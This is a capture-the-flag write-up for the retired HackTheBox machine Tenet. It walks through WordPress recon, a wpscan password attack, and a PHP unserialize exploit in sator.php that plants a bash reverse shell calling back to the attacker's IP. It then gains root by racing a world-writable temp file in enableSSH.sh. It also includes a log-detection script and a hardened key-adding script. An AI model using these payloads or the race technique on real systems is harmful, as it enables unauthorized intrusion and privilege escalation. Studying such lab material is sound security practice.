
HacktheBox - Tenet - Retired



Recon


As is my custom, I start with a threader3000 scan of the IP.


Port 22 is open
Port 80 is open
Port scan completed in 0:00:19.560415


Just two ports: 22 and 80.


We will let threader run the suggested nmap scan.


Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.10.223 10.10.10.223
************************************************************




PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Standard OpenSSH for HTB: OpenSSH 7.6p1.


And Apache 2.4.29 on port 80, let's check it out.




Default Apache page.


Let's see if we can find anything else being served on port 80



Pretty quickly we get back some hits.



WordPress is installed here, let's check it out.





If we add tenet.htb to our /etc/hosts file we now get this.



And it's powered by WordPress



Let's fire off wpscan and see if we can find a path forward.




Let's throw rockyou.txt at any discovered users too, and see if we can get some easy wins.


wpscan --url http://tenet.htb/ -e u --passwords /usr/share/wordlists/rockyou.txt





Pretty quickly we get some good info.


XMLRPC seems to be enabled.


There is an upload folder.



WordPress version is 5.6.


Two users were identified: protagonist and neil.






A login portal



A comment from the user neil



What is sator?


Let's see if it's a vhost here and add it to our /etc/hosts.


Now we get a default Apache page when we browse to http://sator.tenet.htb.



Let's see if we can find the PHP file mentioned in the comment, sator.php.


http://sator.tenet.htb/sator.php



Interesting.



Let's set dirb at this new vhost.



Another WordPress install; let's check this one out.






Remember this in the comment?



And the backup? I wonder if it's still live on sator.tenet.htb… sator.php.bak perhaps?



Looks like it is.








<?php

class DatabaseExport
{
    public $user_file = 'users.txt';
    public $data = '';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this->data = 'Success';
    }

    // Runs automatically when any DatabaseExport object is destroyed:
    // writes $data to a file named by $user_file next to this script.
    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
        echo '[] Database updated <br>';
        // echo 'Gotta get this working properly...';
    }
}

// Request-controlled input goes straight into unserialize().
$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app->update_db();

?>



OK, let's look at this code.


  1. The code reads a GET parameter called "arepo" and passes its value straight to unserialize(), storing the result in the $databaseupdate variable.

  2. There is a method named __destruct() which writes the object's $data to a file named by $user_file in the script's own directory (__DIR__).


But __destruct() isn't called anywhere in the PHP code… or is it?


Do you know about PHP "Magic Methods"?


https://www.php.net/manual/en/language.oop5.magic.php


Basically, in PHP, if you give a method one of these reserved names, PHP calls it for you at the matching event (for __destruct(), when the object is destroyed or the script ends), even if you never call it explicitly in your code.


So the __destruct() function will run every time, including on the object that unserialize() builds from our input.

So we can use the __destruct function to write our own file to the server. We just need to send it serialized data in a form that it will deserialize correctly.
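The unserialize($_GET['arepo']) sink above leaves a very recognisable trace in the web server's access log, so here is the defender-side view, added as an example (it is not part of the original write-up and not code from the box): two shell functions that scan Apache combined-format log lines for a query parameter whose value starts with PHP's serialized-object prefix O:<len>:"<Class>":, raw or URL-encoded, and reduce the hits to the parameter and class names an analyst would want. The log lines are constructed for this example; the hosts and paths in them are hypothetical.

```bash
#!/bin/bash
# Added example, not part of the original write-up: spot requests whose query string
# carries a PHP serialized object, the shape a payload for an unserialize($_GET[...])
# sink has to take. The log lines below are constructed; hosts and paths are hypothetical.

# Print every Apache combined-format log line (read from stdin) that has a query parameter
# whose value begins with  O:<digits>:"  either raw or URL-encoded (O%3A<digits>%3A%22).
find_serialized_requests() {
    grep -E '[?&][A-Za-z0-9_]+=(O:[0-9]+:"|O%3[Aa][0-9]+%3[Aa]%22)'
}

# Reduce matching lines to "<parameter> <class>" so an analyst sees which sink and which
# class were targeted. %3A and %22 are decoded before the final rewrite.
extract_class_names() {
    grep -Eo '[A-Za-z0-9_]+=(O:[0-9]+:"[A-Za-z0-9_]+"|O%3[Aa][0-9]+%3[Aa]%22[A-Za-z0-9_]+%22)' \
      | sed -E 's/%3[Aa]/:/g; s/%22/"/g' \
      | sed -E 's/^([A-Za-z0-9_]+)=O:[0-9]+:"([^"]+)"$/\1 \2/'
}

# Constructed sample: a plain request to sator.php, one raw serialized payload, one
# URL-encoded payload, and an unrelated request that must not match.
SAMPLE_LOG='10.10.14.16 - - [12/Mar/2021:10:01:02 +0000] "GET /sator.php HTTP/1.1" 200 123 "-" "Mozilla/5.0"
10.10.14.16 - - [12/Mar/2021:10:01:30 +0000] "GET /sator.php?arepo=O:14:"DatabaseExport":2:{s:9:"user_file";s:5:"x.php";} HTTP/1.1" 200 123 "-" "curl/7.74"
10.10.14.16 - - [12/Mar/2021:10:02:11 +0000] "GET /sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7B HTTP/1.1" 200 123 "-" "Mozilla/5.0"
10.10.14.17 - - [12/Mar/2021:10:03:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 5 "-" "Mozilla/5.0"'

# Number of suspicious lines in the sample (expected: 2).
count_hits() {
    printf '%s\n' "$SAMPLE_LOG" | find_serialized_requests | wc -l | tr -d ' '
}

# Distinct "<parameter> <class>" pairs seen in the sample.
targeted_classes() {
    printf '%s\n' "$SAMPLE_LOG" | extract_class_names | sort -u
}

count_hits
targeted_classes
```

On a real server, feed the access log to find_serialized_requests instead of the sample; any hit on a parameter that reaches unserialize() is what sator.php here would have produced. The code-level fix is to never hand request data to unserialize() at all (use json_decode() for structured input), or at minimum to call unserialize($input, ['allowed_classes' => false]) so no application class, and therefore no __destruct(), is ever instantiated from the input.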




Exploit


So let's write a small PHP snippet on our machine that serializes what we want to send, and then fire that over to sator.php.



Let's grab our favorite little tiny PHP reverse shell.


https://gist.github.com/rshipp/eee36684db07d234c1cc


<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");?>



And modify it to use our VPN IP and port.


<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/5555 0>&1'");?>




Now we will build out our code.


class DatabaseExport
{
    public $user_file = 'circusmonkey.php';
    public $data = '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.16/5555 0>&1\'"); ?>';
}

print(serialize(new DatabaseExport));


Make sure you escape the interior single quotes so the output gets written correctly.



Let's run php interactively so we can grab the output.


php -a


Paste in our PHP code.




Here is my output from php:

O:14:"DatabaseExport":2:{s:9:"user_file";s:16:"circusmonkey.php";s:4:"data";s:74:"<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/5555 0>&1'"); ?>";}



Now I'm going to use burp to capture the request, send it over to repeater and insert our variable.



This is the original GET request.

Over in repeater I'll just add the serialized output as a variable named arepo and send it over to the machine.



We got back a 200 from the server, so it looks like we were able to place the file.


Let's start our netcat listener to hopefully catch our shell.


nc -lnvp 5555


Then we just need to browse to the circusmonkey.php file and hopefully we get a shell.



And we do have a shell, let's figure out next steps now.


I think we found our path in the first three commands I check when starting out.




www-data can run /usr/local/bin/enableSSH.sh as root with no password.


cat /usr/local/bin/enableSSH.sh
#!/bin/bash

checkAdded() {
    sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
    if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
            /bin/echo "Successfully added $sshName to authorized_keys file!"
    else
            /bin/echo "Error in adding $sshName to authorized_keys file!"
    fi
}

checkFile() {
    if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
            /bin/echo "Error in creating key file!"
            if [[ -f $1 ]]; then /bin/rm $1; fi
            exit 1
    fi
}

addKey() {
    tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
    (umask 110; touch $tmpName)
    /bin/echo $key >>$tmpName
    checkFile $tmpName
    /bin/cat $tmpName >>/root/.ssh/authorized_keys
    /bin/rm $tmpName
}

key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu"
addKey
checkAdded


We don't have write access to the script.



But what is the script doing?



Well, this bit uses mktemp -u to pick a new file name in /tmp of the form ssh-<random>. That's what mktemp does: it hands you a random file or folder name (with -u it only generates the name; the touch on the next line is what actually creates the file).


https://www.cyberciti.biz/tips/shell-scripting-bash-how-to-create-temporary-random-file-name.html



Then, because of the umask 110, the touch creates the file with permissions rw-rw-rw-, so any user on the box can write to it.

https://www.linuxtrainingacademy.com/all-umasks/


Then it echoes the key variable from the bottom of the script into that file, runs it through a check of some sort (checkFile), and if it passes it appends the file's contents to /root/.ssh/authorized_keys.


So if we can sneak our key into this process somehow we can hopefully have it added to authorized_keys for the root user :)


We just need to find a way to look for files named ssh-* in /tmp and, when one appears, keep writing our public key into it; hopefully we can catch it after the script writes the hard-coded key to the file but before it copies that file into authorized_keys.


Then run the enableSSH.sh script as root with our sudo privileges.
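For contrast, here is how the same add-a-key routine looks once the window above is closed, as an added example (my code, not the box's enableSSH.sh and not from the original post): mktemp is used without -u so it creates the file itself, atomically and with mode 0600, the temp file's content is re-checked before it is appended, and the "was it added" check looks at the key material rather than the comment field that checkAdded() greps for. The key, directory and file names it uses are constructed.

```bash
#!/bin/bash
# Added example, not the box's enableSSH.sh: the same "append a key" job written so
# the race window described above does not exist. Key and paths below are constructed.
set -eu

# Create the temp file privately and atomically. mktemp without -u creates the file
# itself with mode 0600, so no other user can open it for writing; the restrictive
# umask is belt and braces for anything else created in the subshell.
make_private_tmp() {
    local dir="${1:-${TMPDIR:-/tmp}}"
    (umask 077; mktemp "$dir/ssh-XXXXXXXX")
}

# Append one key to an authorized_keys file. The temp-file detour is kept only to
# mirror the original script; the file is private and its content is re-checked
# before it is copied, so a second writer cannot slip anything in.
add_key_safely() {
    local key="$1" dest="$2" tmp
    tmp=$(make_private_tmp "$(dirname "$dest")")
    printf '%s\n' "$key" > "$tmp"
    if [ "$(cat "$tmp")" != "$key" ]; then
        rm -f "$tmp"
        return 1
    fi
    cat "$tmp" >> "$dest"
    rm -f "$tmp"
}

# Confirm a key is present by its key material (field 2), not the free-text comment
# (field 3) that the original checkAdded() grepped for.
check_added() {
    local key="$1" dest="$2" pub
    pub=$(printf '%s' "$key" | cut -d ' ' -f 2)
    grep -qF -- "$pub" "$dest"
}

# Permission string of a file as ls prints it, e.g. -rw-------
mode_of() {
    ls -l "$1" | cut -c1-10
}

# Stand-alone demonstration against a scratch directory (constructed key, not a real one).
main() {
    local d k t
    d=$(mktemp -d)
    k="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedExampleKeyNotReal example@host"
    add_key_safely "$k" "$d/authorized_keys"
    check_added "$k" "$d/authorized_keys" && echo "key present in $d/authorized_keys"
    t=$(make_private_tmp "$d")
    echo "temp file mode: $(mode_of "$t")"
    rm -rf "$d"
}
main "$@"
```

Simplest of all is to drop the temp file entirely and append the key straight to authorized_keys; the temp-file form is kept here only to show what the original should have done with mktemp and umask.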


OK, first things first.


Let's generate a new set of keys that we can use.


ssh-keygen -t rsa



I told it to save mine in my HTB folder for tenet. I used touch to create the file beforehand :)




And we look at our key.




OK, that step is out of the way.


How can we monitor the folder /tmp for new files named ssh-*?


We can use tee to write the output of a command to a file, and we can use wildcards with tee.



So we could echo our public key and pipe it to tee to write it into any file named ssh-*.


And if we stick that all in a loop, hopefully we can just keep it running while we run the enableSSH.sh script as root and get our public key copied into /root/.ssh/authorized_keys.


We can use a bash infinite loop to just repeat the command like crazy :)

https://www.cyberciti.biz/faq/bash-infinite-loop/



So, put together, our command would look something like:



while true; do echo "ssh-rsa AAAAB3NzaC1yc******************************************************************************************************************************************************************************************************************************************* kali@kali" | tee /tmp/ssh* >/dev/null;done




Then we can throw a & on the end of the command so it runs in the background, and call the enableSSH.sh script as root using sudo.



Since this is blind and we don't know if it works when we run it, I ran it a bunch of times to up our chances of our key actually making it into authorized_keys.



Now we can try to connect up as root using SSH




Forgot to change the permissions on the id_rsa private key we created. Fixed it with:


chmod 600 ./id_rsa



But after that…


We are root!!







